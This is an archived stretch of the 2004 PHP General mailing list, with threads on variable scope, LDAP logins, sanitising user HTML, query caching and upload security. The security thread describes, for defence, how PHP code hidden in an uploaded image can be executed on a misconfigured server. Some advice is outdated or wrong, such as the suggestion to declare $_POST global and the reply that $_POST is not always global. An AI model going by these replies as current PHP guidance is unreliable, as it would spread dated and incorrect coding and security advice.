Jasper Howard - Database Administration
ApexEleven.com
530 559 0107
---

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
Below is a snip of a program I am writing, I am a little new to php.
Any how, I can't for the life me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in a if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.


if (array_key_exists('pictures', $_POST)) {
    $how_many_pics = $_POST['pictures'];
    picture_input($how_many_pics);
    //process_errors();
    $k = '1';
    while ($k <= $how_many_pics) {
        $item_pics1 .= "<td align=\"center\"><A HREF=\"pics/full_$k.jpg\" onMouseOver=\"hiLite3('img03','clickme5')\">";
        $item_pics1 .= "<img src=\"pics/thumb_$k.jpg\" border=\"0\"></td>";
        $k++;
    }
    html_form($title, $price, $descrip, $current_items,
        $title_file_name, $errors);
} else {
    print '<form method=post action=add-item.php>';
    print '<tr><td>How Many pictures do you have?: </td><td><input type=text name=pictures size=2></td></tr>';
    print '</form>';
}



function html_template() {
    if (file_exists('item.html')) {
        $html_template = $GLOBALS['html_template'];
        $html_template = str_replace('{pictures2}',
            $GLOBALS['item_pics1'], $html_template);
        $html_template = str_replace('{title}', $GLOBALS['title'],
            $html_template);
        $html_template = str_replace('{description}',
            $GLOBALS['descrip'], $html_template);
        $html_template = str_replace('{price}', $GLOBALS['price'],
            $html_template);
        $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
            "/item.html";
        $item_fh = fopen($item_file_name, 'x+');
        fwrite($item_fh, $html_template);
    } else {
        $GLOBALS['errors'] .= "item.html template does not exist";
    }
}

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] about installing php

2004-12-09 Thread Richard Lynch
satya bharti wrote:
 sir,
 I am using Red Hat Linux 8.0, and tried many times to install apache 2.0
 and php4.0  many times, the message comes that apache and php has
 installed on my system. when i execute a php program through my web
 browser it shows blank. what causes this and how can I solve this problem?
 plz help on this matter.

Any time a PHP page shows blank, you should use your browser's View
Source menu to see what's *REALLY* in there.

It can help you understand what is going on most of the time.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] login.php

2004-12-09 Thread Richard Lynch
badlya badlu wrote:
 This is my first mail to php mailing list. i want to
 create one login.php program in linux. i want this
 page to go the ldap server for authentication. how
 should i do it.

http://php.net/ldap

You may also want to just use somebody else's LDAP PHP script.

I'm betting you could find one at http://phpclasses.org or just Google for
LDAP PHP

One thing for sure:  The mailing list community isn't going to just write
the code for you and post it here. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Richard Lynch
Matt Palermo wrote:
 I am allowing users to input HTML code into a textarea.  After they input
 this, I want to output their HTML to the browser.  In order for the
 document
 to be safe, I need to close all open HTML tags that have been left open by
 the user, along with any open comments.  Is there a way to take an HTML
 string and add closing tags and comments to it if needed?

After you use http://php.net/tidy to fix the HTML, use
http://php.net/strip_tags to rip out all but the handful of tags you
really want to allow them to use, most especially any JavaScript they
might shove in to attack your (and my!) server.

I *think* strip_tags rips out JavaScript.   RTFM to be sure.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

--- Richard Lynch [EMAIL PROTECTED] wrote:

 Then your new script is broken, as clearly the GET
 parameters *ARE* there.

Sorry, I'm not following you.  Where are my GET
parameters ?  The way I've built my present script is
the results page is grabbing the parameters.  Do I need
to set up GET parameters in the first/search page ?

 
 Is the new script on a different server or in a
 different directory? 
 Perhaps with register_globals turned OFF?
 
No , same server, The new scripts are in a different
directory than the previous one. They are not related
or call to each other. Register_globals are set to ON.

Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread John Nichel
Danny Brow wrote:
Below is a snip of a program I am writing, I am a little new to php.
Any how, I can't for the life me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in a if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.
snip
If you want to use a variable from outside the function, you either have 
to pass it to the function; if you want to change it, you have to pass 
it by reference, or make it global inside the function

function foo ( $bar ) {
    /* --code-- */
}
function foo ( &$bar ) {
    /* --code-- */
}
function foo() {
    global $var;
    /* --more code-- */
}
I may be mistaken, but I think the $GLOBALS array was introduced in 4.3.0.
http://us4.php.net/manual/en/language.variables.scope.php
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread John Nichel
Belay that...the $GLOBALS array has existed since PHP3
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] Object In Object

2004-12-09 Thread Dinçer Akay
Hi,
Is this a good way ?
<?php

class main{
    var $mysql;
    var $user;
    function main(){
        $this->mysql=new mysql();
        $this->user=new user();
    }
}

class Mysql
{
    function x(){ return "Some Query Result for ";}
}
class  user
{
    var $username;
    function user(){$this->username="Guest";}
}
/* Other subclasses */
class Data extends main{
    function getText(){
        echo $this->mysql->x();
        echo $this->user->username;
    }
}

$class=new main();
$data=new  Data();
$data->getText();

?>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com

2004-12-09 Thread Danny Brow
I'm getting it too.

On Thu, 2004-12-09 at 09:49 -0800, Justin Palmer wrote:
 Hi,
 
 Every time I send a response to the list I get a auto-reply from:
 [EMAIL PROTECTED]
 
 Is there someone that I could email that can delete this user from the
 list?
 
 Thanks for any information.
 
 Regards,
 
 Justin Palmer
 __
 KISS (Keep It Simple, SEARCH)!
 Google::getUri( http://www.google.com );
 Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );
 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote:
 Danny Brow wrote:
  Below is a snip of a program I am writing, I am a little new to php.
  Any how, I can't for the life me figure out why one of my functions
  cannot grab the item_pics1 variable. I have tried passing the variable
  to the function, tried using $GLOBALS['item_pic1']. So I guess my
  question is, does PHP in some cases need to have a variable in a if
  statement sent back to the global scope? everything works but the
  str_replace item_pics1. Hope this is enough code.
 snip
 
 If you want to use a variable from outside the function, you either have 
 to pass it to the function; if you want to change it, you have to pass 
 it by reference, or make it global inside the function
 
 function foo ( $bar ) {
   /* --code-- */
 }

 function foo ( &$bar ) {
   /* --code-- */
 }
 
 function foo() {
   global $var;
   /* --more code-- */
 }
 
See this is where the confusion is, I've tried all these and it still
does not work.  I'm going to read the whole page on variable scope a few
times, see if I missed something.  Maybe it's something else in my code
screwing me up.

Thanks.
Dan.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Re: Object In Object

2004-12-09 Thread Matthew Weier O'Phinney
* Dinçer akay [EMAIL PROTECTED]:
 Is this a good way ?
 <?php

 class main{
 var $mysql;
 var $user;
 function main(){
 $this->mysql=new mysql();
 $this->user=new user();

If you're developing strictly for PHP5, this will work fine. However, if
you're in PHP4, you're going to want to use references. Try the
following:

  $mysql       = new mysql();
  $this->mysql =& $mysql;
  $user        = new user();
  $this->user  =& $user;

Other than that, yes, this is a fairly standard mechanism in PHP's OOP.

-- 
Matthew Weier O'Phinney   | mailto:[EMAIL PROTECTED]
Webmaster and IT Specialist   | http://www.garden.org
National Gardening Association| http://www.kidsgardening.com
802-863-5251 x156 | http://nationalgardenmonth.org

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-09 Thread Richard Lynch
 Also, you *SHOULD* force the file to be saved on your server
 with the correct extension. If a user can upload a JPEG with
 .php on the end, or worse, with php in the middle of the
 filename, and then your server puts that file in the web tree or
 otherwise allows it to be executed, *YOU* (and your server
 admin) screwed up your security, not PHP.

 Trusting the name provided by the client is certainly a bad practice, but
 I wouldn't consider php in the middle of a filename to be worse than
 extension manipulation. I'm not sure what gave you that idea, but it's
 just not true.

The original article, in another newsgroup/list, referenced a server seen
by that author, where the SysAdmin had configured the server to use PHP to
parse any file whose name contained 'php'.

Not ending in '.php' ('.php$')

Nor even ending in 'php' ('php$')

But containing 'php' ('.*php.*').

phplogo.jpg, when surfed to, went through PHP.

Real-life problem.

Yes, that's a horribly-configured server.

No, I don't think you'd have that on your server.

But I'd bet at least one reader on this list misunderstands the Apache
<Files> directive (with and without the ~) badly enough that they've got
this gaping hole on their server.

Now combine that with putting uploaded JPEGs in the web tree, and what
have you got?

My grammar in my post incorrectly put the 'or worse' near 'php in the
middle' when it should have been near 'your server ... allows it to be
executed'

The real culprit, is, of course, the mis-configured server.

But it takes two to tango, here, and throwing the JPEGs in the web tree
should not be done unless you *NEED* to do that, for performance, after
due consideration and a security audit to be *SURE* that the JPEGs cannot
ever possibly get executed as PHP.

 Under *NO* circumstances should a file uploaded by an
 untrusted user be put into your web tree. You should *KEEP* it
 outside the web tree, and use PHP to http://php.net/readfile it
 when it needs to be displayed. Since you are using PHP's
 readfile function to *READ* the file, Apache won't have any
 chance to get fooled into thinking it's supposed to be a PHP file
 and be parsed by PHP.

 This is misleading. It is fine to put uploaded files within document root,
 and in fact many applications may require this. Using readfile() is not
 realistic except for small sites - the performance penalty alone makes
 this a poor approach, since it provides very little value.

 That being said, it's true that you should not trust the name provided by
 the client (or anything provided by the client), but this is much
 different than blind paranoia. If this perspective were applied to HTML
 forms, no one could use them.

You don't take raw data from HTML forms and save the field values into
your web tree do you?

You scrub the incoming data from the web form and make sure, as much as
possible for the given field, that it is benign, right?  And you certainly
don't http://php.net/eval that untrusted data from a user, do you?

Then why in the world would you take an untrusted, unscrubbable, binary
file and shove it into your web-tree?!

Can you be 100% certain that <?php /* bad code here */ ?> is not embedded
in the JPEG?  How?  getimagesize() will tell you the JPEG headers are
kosher, but not confirm that the JPEG itself is really really just JPEG
data.

Even viewing it would only, at best, show you an ugly JPEG.

You could egrep for <?php.*?>, and assume that that's not valid in any
JPEG, but it probably actually *IS* valid in at least one real JPEG -- And
if you allow JPEG comments, it would be trivial to have a zillion JPEGs
that would pass any automated validation of JPEG-ness that have PHP code
in the comment.

What's to stop the bad guy from taking a valid JPEG, cramming PHP code
into it, and then surfing to the image directly in such a way that the PHP
code gets executed?

Sure, your server configuration almost for sure doesn't have .jpg files
going through the PHP parser.  But if they can find a way to force that to
happen:
  Altering an .htaccess file somewhere, or forcing one to be uploaded.
  Finding an old cgi-bin setup on the server.
  Getting the CLI PHP to execute the JPG as a script.

It's hard to imagine that last one without them being able to just TYPE a
PHP script, mind you, but some whack 'sudo' setup might do it.  Think
every SysAdmin who uses sudo really understands sudo completely?

Hopefully, none of these things can be done on your server.  If you are
100% certain that none of these could ever possibly occur, then you are
confident that the JPEGs with PHP embedded will only be ugly JPEGs.

But if there is any doubt in your mind that a malicious user could manage
to get the JPEG to be passed through PHP (or Perl or ...) then you've got
a risk there that may not be obvious to the casual
Reader/Sysadmin/Programmer.

Busy servers may have a performance problem with using the readfile
solution -- But that's no excuse to expose that busy server by just
throwing an 

Re: [PHP] PHP Security

2004-12-09 Thread Richard Lynch
 There are better ways to do this than parsing .jpg files as PHP. One
 obvious one is:

 http://example.org/image.php/foo.jpg

I believe this broke on a very very very obscure version of IE -- Maybe
even the re-branded IE I ran into one time [shudder].

In theory, it was just IE X.xx.yy, but it turned out to be *different* for
some case involving rich media.

I cannot for the life of me find the references from my day job four times
removed to prove it, mind you, and maybe it was with PDF and not JPEG, but
at some point, I just don't want to give browsers (or search engines)
*ANY* realistic opportunity to spot .php and decide that my dynamic
image is inferior/invalid.

 Another one that I've seen referenced frequently (especially back when
 this was a larger and more common problem) is this:

 http://example.org/image.php?iesucks=foo.jpg

In the larger picture of rich media in general, this will fail miserably
for dynamic PDFs.

If I have to dink around with PATH_INFO for PDFs to behave, I might as
well treat my JPEGs with the same code-base and use:
http://example.com/image/iesucks/foo.jpg
http://example.com/pdf/iesucks/foo.pdf

Too many browsers, too many bugs == I'm not letting them waste my time
any more on their stupidity.

I wouldn't recommend that users configure servers to parse *ALL* *.jpg
in a directory as PHP, of course.  Ditto for *.pdf

But to be sure the browser can't mess up, I'll cheerfully force image to
be a PHP script and foo.jpg is just in the PATH_INFO, or for a one-off,
force progress_meter.jpg to be a PHP script.

I can't begin to estimate the number of hours I've wasted on browser bugs
with rich media where the browser used the URL to do something incredibly
stupid instead of just taking the valid data being sent and doing the
right thing.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
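
Added example, not part of the archived messages: the upload handling argued for in the two PHP Security messages above (server-chosen name and extension, storage outside the web tree, delivery through readfile() behind an image.php/foo.jpg style URL), written for current PHP rather than the PHP 4 of the thread. The directory, the function names and the 32-hex-character naming scheme are assumptions made for the example.

```php
<?php
// Added example. UPLOAD_DIR, the function names and the naming scheme are
// assumptions, not anything taken from the thread.

const UPLOAD_DIR = '/var/app-data/uploads';   // assumed path OUTSIDE the document root

// Detected image type => extension the SERVER assigns to the stored file.
const ALLOWED_TYPES = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

/**
 * Store one entry of $_FILES. Returns the server-generated file name,
 * or null when the upload is rejected. $file['name'] is never used, so a
 * client-supplied "x.php" or "phplogo.jpg" cannot influence the stored name.
 */
function store_upload(array $file, string $dir = UPLOAD_DIR): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // getimagesize() only vouches for the headers. As the thread points out,
    // it cannot prove that no PHP source is embedded in the image data, so the
    // protection here is WHERE and HOW the file is kept, not this check.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !array_key_exists($info[2], ALLOWED_TYPES)) {
        return null;
    }

    // Random hex name plus forced extension: the string "php" cannot appear.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$info[2]];
    $dest = $dir . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);   // readable by the application, never executable
    return $name;
}

/**
 * Turn PATH_INFO ("/<32 hex chars>.jpg") into a path inside $dir.
 * Anything that does not match the naming scheme exactly is refused, which
 * also rules out "../" and absolute paths.
 */
function resolve_stored_name(string $pathInfo, string $dir = UPLOAD_DIR): ?string
{
    $name = ltrim($pathInfo, '/');
    if (!preg_match('/\A[0-9a-f]{32}\.(jpg|png|gif)\z/', $name)) {
        return null;
    }
    $path = $dir . '/' . $name;
    return is_file($path) ? $path : null;
}

/**
 * Body of image.php, requested as image.php/<name>. The bytes are streamed
 * with readfile(); the file is never include()d and never handed to the web
 * server's handler mapping, so embedded PHP stays inert data.
 */
function serve_image(string $pathInfo): void
{
    $path = resolve_stored_name($pathInfo);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    $types = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    header('Content-Type: ' . $types[pathinfo($path, PATHINFO_EXTENSION)]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// In the upload form handler:  $stored = store_upload($_FILES['picture']);
// In image.php:                serve_image($_SERVER['PATH_INFO'] ?? '');
```
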



Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Marek Kilimajer
Richard Lynch wrote:
Matt Palermo wrote:
I am allowing users to input HTML code into a textarea.  After they input
this, I want to output their HTML to the browser.  In order for the
document
to be safe, I need to close all open HTML tags that have been left open by
the user, along with any open comments.  Is there a way to take an HTML
string and add closing tags and comments to it if needed?

After you use http://php.net/tidy to fix the HTML, use
http://php.net/strip_tags to rip out all but the handful of tags you
really want to allow them to use, most especially any JavaScript they
might shove in to attack your (and my!) server.
I *think* strip_tags rips out JavaScript.   RTFM to be sure.
not really, but it removes <script> and </script> so javascript is not 
interpreted.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
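
Added example, not part of the archived messages: strip_tags() with an allow-list removes the <script> and </script> tags, as the reply above says, but it leaves the script text in place and keeps every attribute on the tags it allows. One alternative that also closes tags left open is to escape the whole input and then re-enable only bare allow-listed tags. The tag list and the function name are assumptions.

```php
<?php
// Added example. ALLOWED_TAGS and render_user_html() are assumptions for
// illustration; they are not code posted in the thread.

const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'p', 'ul', 'ol', 'li', 'blockquote'];

/**
 * Render untrusted HTML so that only bare allow-listed tags are live markup.
 * Tags with attributes, unknown tags, script elements and comments all stay
 * escaped text; tags the user left open are closed at the end.
 */
function render_user_html(string $input): string
{
    // 1. Escape everything. After this step no markup of any kind is live,
    //    including "<!--", so an unterminated comment cannot swallow the page.
    $escaped = htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // 2. Re-enable only "<tag>" and "</tag>" with nothing else inside the
    //    brackets, keeping a stack of the tags that are currently open.
    $alternatives = implode('|', ALLOWED_TAGS);
    $stack = [];
    $out = preg_replace_callback(
        '#&lt;(/?)(' . $alternatives . ')&gt;#i',
        function (array $m) use (&$stack): string {
            $tag = strtolower($m[2]);
            if ($m[1] === '') {                 // opening tag
                $stack[] = $tag;
                return '<' . $tag . '>';
            }
            if (end($stack) === $tag) {         // close matching the innermost open tag
                array_pop($stack);
                return '</' . $tag . '>';
            }
            return $m[0];                       // stray close stays escaped text
        },
        $escaped
    );

    // 3. Close whatever the user left open, innermost first.
    while ($stack) {
        $out .= '</' . array_pop($stack) . '>';
    }
    return $out;
}

// Constructed sample input: an attribute on an allowed tag, an unclosed <i>,
// a script element and an unterminated comment.
$sample = '<b onmouseover="x()">hi</b> <i>there<script>alert(1)</script><!-- open';

echo strip_tags($sample, '<b><i>'), "\n";   // allow-listed tags keep their attributes
echo render_user_html($sample), "\n";       // only the bare <i> is live, and it gets closed
```
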


Re: [PHP] Re: PHP Security

2004-12-09 Thread Richard Lynch
Chris Shiflett wrote:
 --- Greg Donald [EMAIL PROTECTED] wrote:
 http://seclists.org/lists/security-basics/2004/Dec/0080.html

 Most of this is actually true.

 The one statement that is unclear is the following:

 There are two kinds of flaws :
 - flaws inherent to the php langage itself, as seen before, in file
 uploads.
 - danger in uploading files at all on the server, not dependent
 on the langage used to handle the actual upload, but regarding
 the potential execution of uploaded files.

 This may have meant hypothetically, meaning that there are two areas
 where flaws could potentially exist - in the language or in the code. If
 this was meant to suggest that there are existing flaws in the language,
 then this is never justified.

I didn't find the statement to be unclear:  that kind of flaw can exist,
and it has been seen.

There was, unless I've been severely misinformed, a file upload security
bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
release?  I'm sure anybody on this list can dig out that answer as fast as
I, so I won't.  You'll learn more finding out for yourself anyway.

Now, granted, that flaw was fixed IMMEDIATELY.

And, granted, a SysAdmin who chooses to put Beta software on a server is
responsible for the inherent risks involved.

The point, however, that such potential flaws can exist, and could remain
undetected even now in stable, released code (even PHP) is valid.

I personally don't *believe* such flaws could have survived the scrutiny
after the known problems were suffered by the PHP Development Team.

But I don't think any professional will claim that it's impossible for
them to exist.

PS
For the inexperienced reader:  This is, as far as I know, the ONLY known
security flaw in actual PHP C source code to get anywhere near release
form.

But PHP is a powerful tool, and there are innumerable ways it can be used,
mis-used, and just plain abused by yourself to make your own server
insecure.

Do the best you can to figure out how and when, and you'll do all right.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

 --- Richard Lynch [EMAIL PROTECTED] wrote:
 
  Then your new script is broken, as clearly the GET
  parameters *ARE* there.
 
 Sorry, I'm not following you.  Where are my GET
 parameters ?  The way I've built my present script
 is
 the results page is grabbing the parameters.  Do I
 need
 to set up GET parameters in the first/search page ?
 
  
  Is the new script on a different server or in a
  different directory? 
  Perhaps with register_globals turned OFF?
  
 No , same server, The new scripts are in a different
 directory than the previous one. They are not
 related
 or call to each other. Register_globals are set to
 ON.
 
I don't mean to drag this out as I have my work cut
out for me. I did want to add a few more factors that
perhaps is preventing this script from doing the
things I want. 

The first search / results form (the one that works):
a: is really proprietary code which is why I want to
dump it
b: It was created as one page and then I broke the
grid(results) portion off, so:
c: In the new scripts the search and results were
created separately and most of the code is in the
results page. 
What I'm saying is in the search form, all that exists
is the form elements themselves and some resultsets
that feed the multi select lists and menu drop downs.

The results page, has the resultset for formulating
the return records, but it also has the query string
code that grabs the parameters explodes and implodes
them.  
I'm wondering if perhaps I need some of this code in
the search page. 

I wouldn't be throwing this out again, as the scripts
work, but it's that I need to get the query string
back into the search form and have it display the
parameters there.  I don't even know if that is a
standard function of search pages.  I've done some
googling but have not come up with something that
addresses this type of functionality.

Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Implementing database cache.

2004-12-09 Thread Richard Lynch
Bruno B B Magalhães wrote:
 does anybody have an idea of which are the required functions to
 implement a database query cache? I have a very nice and fast database
 layer, which I use in all my projects (about 19 sites and a lot of
 others hot-sites and systems like intranet and extranets). Here is my
 idea of the functions:

 is_cached();
 read_cache();
 clear_cache();
 write_cache();

 And what is the fastest way, shared memory perhaps? And I would have to
 use serialize function to store query results right? and about the
 cache name (or cache_id whatever) I was thinking about using a md5 hash
 of the query itself.

 I would love any ideas! :)

1. Rolling your own database cache is probably not a fruitful exercise,
except as a learning experience.  Honest.  The database vendors already
have a cache you can use, and you're not going to beat their performance
with your own in any kind of reasonable development time-frame.

2. You can't serialize the objects, connection, or result, from MySQL
functions.  I'm 100% certain of the connection object, and 99.9% certain
of the result set object.  Those objects go invalid when a script ends, no
matter how you try to save them.  You'll have to suck out all the data and
store that.

3. Shared memory, last time I checked, was a real [bleep] to use because
of a race condition in getting a unique name/semaphore for the storage
space on a server-wide basis.  Maybe this has changed since I last looked,
but back in the day, you were taking the risk that your PHP shared memory
would get trashed by, say, Perl using shared memory.  Or any other
application that wanted to use shared memory.  I *hope* this has been
fixed, for your sake, but be sure you read up on it.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] How to make a PHP Socket client crash-proof?

2004-12-09 Thread Richard Lynch
Have you completely eliminated the possibility of having a second,
independent, completely unrelated client/socket which is used to *SEND*
data to the server?

client_get <-- server
client_send ---> server

They can both use your local database to share data, to whatever degree
you deem necessary, but having one-way sockets for two different scripts
is way more easier than trying to get a two-way socket to work, in my
(limited) experience.

If you MUST push forward with a two-way socket, try to determine the state
of the world inside your infinite loop.  Why aren't you breaking out of
that loop?  Can you do *anything* to break out?

I suspect that once you have started SENDING data to the server, it's
going to just keep waiting for you to send more.  How do you signal the
end of your data to be sent?  Does the server understand that signal?

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Pass mysql array into SESSION?

2004-12-09 Thread Richard Lynch
Jerry Swanson wrote:
 I want to pass an array from one page to Excel generation page. I
 tried to pass through session($_SESSION['sql'] = $var). But value is
 not set.

 The array is actually $result = mysql_query($query);

The result from mysql_query() is not an array.

It's a MySQL result reference.

It is tied, by its nature, to the MySQL link (connection) object from
mysql_connect.

Neither the result objects, nor the link object, can survive the end of a
PHP script, for technical reasons.  Actually, maybe some day somebody can
make this work, but it would be real [bleep].  Plus, you'd really only
want to use this in extreme circumstances, despite the seemingly obvious
bonus of expensive database connections surviving for true re-use.

Anyway, back to the more mundane level of your problem:

Use mysql_fetch_array (or mysql_fetch_row, or whatever) to actually get
the content you need, and you can save that in your session.

Depending on how much data you are saving, and how large the strings are
(War and Peace?) you might actually be better off just re-doing the query
in the next script.  You'll have to test on *YOUR* data on *YOUR* server
to be sure either way.  Too many variables render anybody else's data
(mostly) meaningless.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] fread()

2004-12-09 Thread Richard Lynch
Russell P Jones wrote:
 Is there any way to use fread() or a similar function to read a section of
 a document NOT starting at the beginning...

 for example, I can read the first 1000 bytes of a document with

 fread($doc, 1000);

 Is there any way to read the second 1000 bytes?

 perhaps, fread($doc, 1000, 2000); who knows

 or would substr work?

substr would work but performance would most likely suck.

Perhaps you are seeking http://php.net/fseek

:-p

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Richard Lynch
My best guess from skimming your code is that you need:

global $_POST;

in the function that uses $_POST.

Or is $_POST always global anyway?

I always forget, because they changed it around on POST/GLOBALS/etc at
some point, but only on some of them.  Grrr.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
 My best guess from skimming your code is that you need:
 
 global $_POST;
 

should I put this at the top of my code with the rest of my variables?

 in the function that uses $_POST.
 
 Or is $_POST always global anyway?
No. 

 
 I always forget, because they changed it around on POST/GLOBALS/etc at
 some point, but only on some of them.  Grrr.
 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 15:39 -0500, Roger Spears wrote:
 Danny Brow wrote:
  On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote:
  
 Danny Brow wrote:
 
 Below is a snip of a program I am writing, I am a little new to php.
 Any how, I can't for the life me figure out why one of my functions
 cannot grab the item_pics1 variable. I have tried passing the variable
 to the function, tried using $GLOBALS['item_pic1']. So I guess my
 question is, does PHP in some cases need to have a variable in a if
 statement sent back to the global scope? everything works but the
 str_replace item_pics1. Hope this is enough code.
 
 
 This may seem a little simple, but it's happened to me.  Are you sure 
 the variable has a value?

Yes, I can do a print $item_pics before and after the function.

dan.

PS. Roger, sorry for sending this to you twice, you sent your reply to directly 
and not to the list.




Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> My best guess from skimming your code is that you need:
>
> global $_POST;
>
> in the function that uses $_POST.
>
> Or is $_POST always global anyway?
>
> I always forget, because they changed it around on POST/GLOBALS/etc at
> some point, but only on some of them.  Grrr.

After reading this again, the function does not use $_POST at all.

here it is again.

function html_template() {
    global $item_pics1;
    if (file_exists('item.html')) {
        print "This is item_pics1" . $item_pics1;
        $html_template = $GLOBALS['html_template'];
        $html_template = str_replace('{item_pictures}', $item_pics1,
            $html_template);
        $html_template = str_replace('{title}', $GLOBALS['title'],
            $html_template);
        $html_template = str_replace('{description}',
            $GLOBALS['descrip'], $html_template);
        $html_template = str_replace('{price}', $GLOBALS['price'],
            $html_template);
        $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
            "/item.html";
        $item_fh = fopen($item_file_name, 'x+');
        fwrite($item_fh, $html_template);
    } else {
        $GLOBALS['errors'] .= "item.html template does not exsit";
    }
}




Re: [PHP] Re: PHP Security

2004-12-09 Thread John Nichel
Richard Lynch wrote:
Chris Shiflett wrote:
--- Greg Donald [EMAIL PROTECTED] wrote:
http://seclists.org/lists/security-basics/2004/Dec/0080.html
Most of this is actually true.
The one statement that is unclear is the following:
   There are two kinds of flaws :
   - flaws inherent to the php language itself, as seen before, in file
   uploads.
   - danger in uploading files at all on the server, not dependent
   on the language used to handle the actual upload, but regarding
   the potential execution of uploaded files.
This may have meant hypothetically, meaning that there are two areas
where flaws could potentially exist - in the language or in the code. If
this was meant to suggest that there are existing flaws in the language,
then this is never justified.

I didn't find the statement to be unclear:  that kind of flaw can exist,
and it has been seen.
There was, unless I've been severely misinformed, a file upload security
bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
release?  I'm sure anybody on this list can dig out that answer as fast as
I, so I won't.  You'll learn more finding out for yourself anyway.
<snip>
I'm pretty sure Chris is one who doesn't have to dig to find out about 
an old security flaw.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]


Re: [PHP] Confused - $GLOBALS

